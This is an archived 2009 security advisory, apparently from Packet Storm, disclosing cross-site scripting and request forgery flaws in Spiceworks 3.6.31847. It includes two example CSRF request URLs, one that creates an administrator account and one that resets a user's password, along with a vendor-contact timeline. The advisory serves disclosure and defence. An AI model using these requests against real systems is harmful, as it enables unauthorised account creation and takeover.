what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Spiceworks 3.6.31847 XSS / XSRF

Spiceworks 3.6.31847 XSS / XSRF
Posted Aug 11, 2009
Authored by Adam Baldwin

Spiceworks version 3.6.31847 suffers from cross site scripting and cross site request forgery vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | b2dd9ecd24e0e81ec7f60bfed240a2d836cb0aad58dd4b3fdce264ca62ca2a8a
Download | Favorite | View

Spiceworks 3.6.31847 XSS / XSRF

Change Mirror Download
nGenuity Information Services - Security Advisory

   Advisory ID: NGENUITY-2009-009 - Spiceworks Multiple Vulnerabilities
(XSS & CSRF)
   Application: Spiceworks 3.6.31847
        Vendor: Spiceworks
Vendor website: http://www.spiceworks.com
        Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)
         Class: XSS, CSRF

  I. BACKGROUND
     Spiceworks is a network management, monitoring, helpdesk, etc
application that
     uses a web based front end.

 II. DETAILS
     Multiple vulnerabilities exist within the Spiceworks platform that
can be used
     to take over or otherwise abuse the application / infrastructure.

     These vulnerabilities allow for the following attack scenarios to
be executed.

     1. Creation of a new Administrator account
     2. Password reset of users

     Exploit Examples:
     Create Administrator Account:
http://example.com/settings/users/create?user%5Bfirst_name%5D=Joe&user%5Bla
st_name%5D=Nobody&user%5Bemail%5D=user%40example.com&user%5Brole%5D=admin&us
er%5Bpassword%5D=PASSWORD&user%5Bpassword_confirmation%5D=PASSWORD

     User Password Reset:
http://example.com/settings/users/change_password/1?user%5Bpassword%5D=PASSWORD
&editorId=password_entry_for_1

III. REFERENCES
     [1] - http://www.spiceworks.com
     [2] - http://cwe.mitre.org/data/definitions/79.html
     [3] - http://cwe.mitre.org/data/definitions/352.html

 IV. VENDOR COMMUNICATION
     4.1.2009 - Vulnerability Discovery & Vendor Notification
     4.6.2009 - Second attempt to contact vendor
     4.7.2009 - Initial vendor response
     8.8.2009 - Advisory Release

Copyright (c) 2009 nGenuity Information Services, LLC

http://www.ngenuity.org/wordpress/2009/08/08/ngenuity-ticket-subject-persistent-xss-in-kayako-supportsuite/
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close